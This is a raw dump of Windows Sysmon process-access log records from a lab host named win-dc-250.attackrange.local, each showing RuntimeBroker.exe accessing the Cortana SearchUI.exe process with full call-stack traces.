13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11166004C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011907Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165504C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011906Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165948C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011905Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165504C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011904Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165948C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011903Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165352C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011902Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11162916C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011901Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165352C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011900Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11162916C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011899Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11166004C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011898Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11163048C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.onecore.dll+1a5a3|C:\Windows\system32\windows.cortana.onecore.dll+1a642|C:\Windows\system32\windows.cortana.onecore.dll+16b12|C:\Windows\system32\windows.cortana.onecore.dll+16a5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011897Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11163048C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.onecore.dll+1a5a3|C:\Windows\system32\windows.cortana.onecore.dll+6118|C:\Windows\system32\windows.cortana.onecore.dll+169b1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce 10341000x800000000000000011896Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11166004C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011895Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11161392C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011894Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11161392C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011893Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11161852C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011892Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11161852C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011891Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165976C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011890Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165976C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011889Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011888Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 